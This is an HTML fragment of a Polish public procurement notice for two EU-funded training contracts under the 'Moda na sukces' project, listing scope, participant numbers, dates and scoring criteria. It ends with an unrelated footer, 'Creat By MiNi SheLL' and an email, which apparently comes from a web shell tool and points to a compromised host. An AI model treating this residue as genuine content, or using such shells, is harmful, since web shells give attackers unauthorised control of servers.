<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT MODA NA SUKCES - CZYLI KROKI W SAMODZIELNOŚĆ WSPÓŁFINANSOWANY ZE ŚRODKÓW UNII EUROPEJSKIEJ Z EUROPEJSKIEGO  FUNDUSZU SPOŁECZNEGO W RAMACH PRIORYTETU VII DZIAŁANIE 7.1. PODDZIAŁANIA 7.1.1. PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1 - Organizacja i przeprowadzenie stacjonarnych zajęć warsztatowych w dziedzinie rozwoju osobistego i kompetencji społecznych z elementami stylizacji i wizażu, oraz indywidualnego doradztwa zawodowego w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie stacjonarnych zajęć warsztatowych w dziedzinie rozwoju osobistego i kompetencji społecznych z elementami stylizacji i wizażu, oraz indywidualnego doradztwa zawodowego w ramach projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.
Liczba uczestników: maksymalnie  77 osób. Szczegółowy opis przedmiotu zamówienia zamieszczono w załączniku nr 1a do SIWZ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie pierwszego trenera - 5</li>
<li>3. doswiadczenie drugiego trenera - 5</li>
<li>4. doświadczenie trzeciego trenera - 5</li>
<li>5. doświadczenie czwartego trenera - 5</li>
<li>6. doświadczenie pierwszego doradcy zawodowego - 5</li>
<li>7. doświadczenie drugiego doradcy zawodowego - 5</li>
<li>8. doświadczenie trzeciego doradcy zawodowego - 5</li>
<li>9. doświadczenie czwartego doradcy zawodowego - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie treningu umiejętności społecznych z elementami aktywnego poszukiwania pracy w ramach Programu Aktywności Lokalnej projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie treningu umiejętności społecznych z elementami aktywnego poszukiwania pracy w ramach Programu Aktywności Lokalnej projektu systemowego Moda na sukces - czyli kroki w samodzielność współfinansowanego ze środków Unii Europejskiej z Europejskiego Funduszu Społecznego w ramach Priorytetu VII Działania 7.1 Poddziałania 7.1.1 Programu Operacyjnego Kapitał Ludzki.
Liczba uczestników łącznie do 10 osób.
Szczegółowy opis przedmiotu zamówienia zamieszczono w załączniku 1b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. doświadczenie trenera - 20</li>
<li>3. doświadczenie doradcy zawodowego - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com